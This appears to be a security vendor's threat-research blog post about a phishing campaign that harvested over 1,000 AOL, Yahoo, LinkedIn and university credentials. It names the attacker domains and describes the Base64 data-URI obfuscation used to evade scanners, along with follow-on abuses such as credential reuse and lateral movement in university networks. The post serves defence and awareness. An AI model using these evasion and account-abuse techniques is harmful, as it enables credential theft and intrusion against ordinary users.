Although most SWG-related blogs talk about exploit kits and malicious code, today we would like to discuss something else in the form of a phishing campaign we recently spotted. Phishing often receives less attention from the InfoSec industry because unlike exploit kits, phishing requires user interaction which means that user education can go a long way in helping cope with phishing attacks, but this doesn't necessarily mean that phishing as a whole poses any lesser threat.
As part of a recent research effort we spotted two domains at first, followed by two more domains, that have successfully compromised a little over 1,000 users. The campaign targeted mainly AOL, but also included phishing pages for Yahoo, LinkedIn and couple of US Universities.
A quick introduction for those who are unfamiliar - phishing is a term used to describe an attack in which the attacker sends a link to a malicious site intended to trick the victim into entering their credentials to the site. The most common form of Phishing attacks is via unsolicited mail, but Phishing attacks can also be executed over Facebook, social networks, messaging applications, etc.
In the case of an unsolicited email, the attacker makes the sender of the email appear to be a reputable source and encourages the reader to click on a link in the email body.
Since an email can be sent in html format, attackers abuse the feature in order to masquerade the links so that they appear to be legitimate.
For example, when you read the email below you see the link as "domain.com" but if you click on it, it will lead you to a different domain, which will likely look very similar to the domain you thought you were clicking to visit.
Figure 1: Example of a basic phishing technique
The domain you actually visit, however, is controlled by the attacker which have changed the login form so that when a victim submits their credentials to the site, they will be saved by the attacker for later use.
In most cases, once you've entered your credentials into a phishing page, you are redirected to the original web site that the attacker impersonated. Sometimes you even receive a fake error message before being redirected to the original site, so that you don't suspect any wrongdoing and instead simply assume that you have mistyped your password.
Now that we've established the basics of Phishing…
Let's dig a little deeper into the case at hand:
The first domain we encountered (f4hkn8ty1jety7sysf4hkn8ty.com) looks like a cat walked all over the keyboard and clicked "register" by accident.
Figure 2: How the domain name might have been generated
Although the domain name doesn't really reveal this, this domain was used for phishing AOL accounts:
Figure 3: AOL Phishing page
But what is interesting about this attack is that the actor was very kind and didn't disable directory listing; on top of that, they saved the phished credentials in clear text on the same server:
Figure 4: Directory listing on the phishing server
Figure 5: Credentials stored in plain text in "ole.txt" on the same server
At the time, when we checked the domain on VirusTotal Trustwave's SWG was the only product on the list to detect this threat:
Figure 6: VirusTotal URL Scan Results
Looking at more data from VirusTotal, it looks like the campaign started around April 9, 2016:
Figure 7: More information about the domain from VirusTotal
Another interesting tidbit we observed was that the domain is registered to "Suzy Leprino" via MELBOURNE IT, which is a domain registrant partner of Yahoo, more on that later.
One more thing that stuck out at us is that the IP behind the domain changed at one point, or more precisely, the hosting provider was changed from Aabaco (Yahoo) in USA to Ecatel in the Netherlands.
Checking the history of both IPs reveals a long history of badness, it's possible that the US IP was already flagged on many blacklists and the actor wanted to change it to a more "clean" IP.
Figure 8: Information about the new IP address (left) and the old IP address (right)
After further investigation we found another domain that had very similar features: like the previous domain, it hosted an AOL phishing page with same obfuscation technique that was used in previous domain, it also saved the credentials in clear text into the same filename "ole.txt". It's unlikely that these two facts are coincidental, which implies that the two attacks are either utilizing the same tool, or may even have the same actor behind them both.
Figure 9: Snippet from "ole.txt"
Intel from VirusTotal indicates that the second domain has been in use much longer, so if the domains are indeed connected to the same actor, this campaign began sometime around March 10, 2016:
Figure 10: Additional domain information on nextblum.com
Below are parts of the two phishing pages for similarity comparison:
Figure 11: Code from the first ("cat-generated") domain – error much?
Figure 12: Code from the second (nextblum.com) domain
The only difference between the two is that on the second domain there was a much wider range of phishing pages which included Yahoo, LinkedIn, Old Dominion University, Lehigh University and a generic page that was used to phish various users with .edu emails:
Figure 13: AOL phishing page on nextblum.com
Figure 14: Generic .edu phishing page on nextblum.com
The phishing page at figure 14 is a phishing scam related to email re-validation, we have been seeing these sort of scams for years, but they appear to be making a comeback recently with a "new" and "stylish" black view.
The actor from this campaign also used another version of this phishing attack some time ago around the end of 2015 on the domain data-rice[.]com , we will show the connection later in the blog.
Figure 15: Generic Email Re-validation Phishing on data-rice.com (Archived on PhishTank)
Figure 16: LinkedIn phishing page on nextblum.com
Figure 17: Old Dominion University phishing page on nextblum.com
Figure 18: Lehigh University phishing page on nextblum.com
The attacker behind those domains used a Base64 encoding obfuscation in most of his pages, this technique is hardly new: the earliest reference that we found to this technique being used in phishing attacks was in this paper from October 2012, but the technique is still commonly used in phishing attacks today in combination with various other techniques, an analysis of one such example can be found here. Using this technique gives the attacker two advantages: it obfuscates the code of the html page used for phishing, and it loads this content dynamically, so any file-based security solutions are likely to miss this threat:
Figure 19: What loading base64 encoded data looks like
Another advantage (or alarming sign for the end-user) is that once the page is loaded the URL in the address bar is changed to "data:text/html;base64,<base64_blob_of_the_encoded_html_file>".
This is sometimes an advantage because the user won't see that they are visiting a different domain than they anticipated; in this particular case visiting f4hkn8ty1jety7sysf4hkn8ty.com instead of aol.com may have alarmed the end-user, so seeing "data:text/html;base64" followed by an extremely long URL may actually be a better alternative for an attacker, as many users may dismiss it due to not understanding the URL structure at all.
OK, But why would an attacker be interested in my email? It's full of spam anyway!
The opportunities here are endless, and depend on the attacker, but we'll name a few:
First of all, the attacker can simply sell these credentials to other cybercriminals in bulks, letting them do all the hard work as the attacker continues to plot their next phishing campaign.
The attacker can also dump the contact lists of the phished accounts and sell them as verified legitimate email addresses, other cybercriminals may buy these lists in order to send them spam emails with different kinds of Trojans, Pony and Locky to name a few.
The attacker can also use the reputation of these compromised accounts with their contact list in order to send further phishing emails to these contacts. This is more of a social engineering angle of the attack, but wouldn't you trust a link from a colleague/family/friend much more than from an unknown sender?
Another possible attack vector for the attacker is to look for sensitive information/pictures in these accounts, and demand a ransom in order not to publish it, who wouldn't pay to keep their affairs as private.
The attacker can also scan the mailbox for other stored credentials, and it's not only the obvious banking or financial credentials that they might be after, do you maybe have the credentials of your small website in your mailbox? Don't be surprised if your site is soon suspended by the hosting company due to an abuse report, many phishing campaigns are, in fact, run off of compromised sites.
One more attack vector is to try the same email:password combination on other websites, it is known that most people use the same credentials across multiple online sites, and your email address is often used as the username for a website, so the same combination of stolen credentials could also work for your PayPal account, for example, making the attacker's online shopping experience much easier.
As you can see the opportunities here are indeed endless, but this specific attacker was also phishing .EDU mails specifically; we don't know the exact reason why, but on top of the possibilities we named above, phishing .EDU (or many other organizations) addresses has added value:
Many Universities uses SSO (single sign on) which basically means that you use the same credentials for all your University services. This means that if I have the password to your email, I also have access to all of the computers that are connected to the university network. Physical access is often not even necessary- some provide VPN info publicly and if that's not available, a simple RDP scan of the University's IP address range may come up with many possible remote terminals.
From within the university network the attacker can then start a lateral movement, so this becomes more of an APT type of attack; combined with sending spear phishing emails to the rest of the .edu contacts in the victim's contact list, an attacker could establish a large foothold in the university network.
Perhaps the attacker was going after something much more simple, as many universities offer a hosting space which is usually accessible from an online page, there the attacker could host their next phishing campaign on it. Coming from an .edu domain could bypass many security filters and blacklists as well as simply seem as more of a legitimate URL to the end users.
This kind of operation is quite easy to pull off and is also inexpensive for the attacker- a phishing campaign can be set up even with some free hosting services. In the time frame of few weeks this attacker managed to obtain over 1,000 credentials, which depending on which of the above methods the attacker chooses to use (if any) could amount to a nice chunk of change.
Do you remember Suzy Leprino from earlier in the post?
Figure 20: Whois info for aninetwolks.com another domain registered to "Suzy"
Figure 21: List of domains registered to "Suzy"
As you can see, "Suzy" has several domains registered under her name, all of which look somewhat fishy, including data-rice[.]com which we mentioned earlier.
When we began our research we were investigating the phishing attack on the "cat walk" domain, we contacted relevant parties at the time to help protect the compromised accounts as well as shut down the infrastructure. While we were waiting for acknowledgment from these parties, we noticed that "Suzy" started using two more of the domains registered to her to spread phishing:
Figure 22: Directory Listing of aninetwolks.com
Figure 23: same ole.txt file on aninetwolks.com
Figure 24: VirusTotal URL Scan Results for aninetwolks.com
Figure 25: VirusTotal URL Scan Results for jamefgoldstein.com
We don't know if Suzy is a fake identity that the attacker created with the purpose of registering these domains, or whether this is an account that was stolen in an earlier phishing campaign, but as you can see, as soon as the previous two domains started being massively blacklisted, the operation immediately moved to two new, clean domains.
Trustwave SWG protects customers against this, and other, phishing attacks.